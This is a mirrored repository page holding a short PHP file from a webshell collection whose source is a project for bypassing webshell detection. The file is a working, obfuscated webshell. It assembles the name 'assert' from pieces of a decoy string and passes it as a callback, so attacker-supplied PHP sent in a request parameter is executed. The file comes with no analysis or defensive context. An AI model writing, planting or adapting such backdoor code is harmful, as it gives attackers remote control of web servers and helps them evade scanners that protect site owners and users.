mirror of
https://github.com/tennc/webshell
synced 2024-11-12 22:47:15 +00:00
32be5d26bf
From:https://github.com/LandGrey/webshell-detect-bypass/tree/master/webshell/php Author:Build by LandGrey
9 lines
211 B
PHP
9 lines
211 B
PHP
<?php
|
|
/**
|
|
* Noticed: (PHP 5 >= 5.4.0, PHP 7)
|
|
*
|
|
*/
|
|
$password = "LandGrey";
|
|
$ch = explode(".","hello.ass.world.er.t");
|
|
array_intersect_ukey(array($_REQUEST[$password] => 1), array(1), $ch[1].$ch[3].$ch[4]);
|
|
?>
|